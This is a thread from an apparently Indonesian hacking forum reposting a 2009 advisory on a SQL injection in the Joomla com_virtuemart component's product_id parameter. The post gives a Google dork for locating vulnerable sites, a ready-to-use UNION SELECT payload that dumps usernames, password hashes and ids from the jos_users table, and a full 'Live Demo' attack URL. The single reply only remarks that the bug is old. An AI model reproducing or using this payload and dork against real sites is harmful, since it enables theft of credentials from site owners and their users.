Username Password

Lost Password
View Thread
Explore Your Brain » All About Security I.T » Info Security
Joomla Component com_virtuemart SQL injection vulnerability (product_id)
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

22-02-2010 06:28 PM Joomla Component com_virtuemart SQL i...
User Avatar

ysufv
Murid Akademi I


Posts: 13
Joined: 22.02.10
# Title: Joomla Component com_virtuemart SQL injection vulnerability (product_id)
# EDB-ID: 10407
# CVE-ID: ()
# OSVDB-ID: ()
# Author: SOA Crew
# Published: 2009-12-13
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
[#] Title:
Joomla Component com_virtuemart SQL injection vulnerability (product_id)

[#] Author:
SOA Crew a.k.a Neo-GabrieL
[gabriel_666@rocketmail.com]
visit us:
http://indonesianhacker.com/
or me @ http://neogabriel.soldiersofallah.org

**********************************/

[#] Software Information
Vendor : http://virtuemart.net/
Download : -
Version : 1.0
Vulnerability : SQL injection
Dork : inurl:"com_virtuemart"
Price : Free
Date : 07-12-09
================================================

[#] Vulnerable
http://localhost/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection]

[#] Exploit
6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users--

[#] Ex. Query
+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1-

[#] Live Demo
http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1

**********************************/
 
Offline
24-02-2010 12:23 AM RE: Joomla Component com_virtuemart SQL i...
User Avatar

EVA-00
HackAge


Posts: 2770
Joined: 21.05.08
Location: Wallahu a'lam
Age: 38
Lah ini kan bug lama bro, taun 2009? tapi ga apa-apa keep posting Ok.Wink
Nabi Muhammad SAW bersabda :ā€¯ Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahuiā€¯ (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
SQL injection [Attack + Defense] Black & White Proof of Concept 8 10-05-2011 22:06
HTML Injection In Social Networking Site (POC For Dummies) Black & White Proof of Concept 14 17-03-2011 20:31
HAVECMS 2.0 Beta <======= SQL Injection Info Security 10 26-09-2010 21:52
WebSuite Content Management System (SQL Injection) Info Security 3 13-09-2010 19:06
Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability Author: JosS Info Security 2 23-08-2010 12:57
Copyright © 2007-2016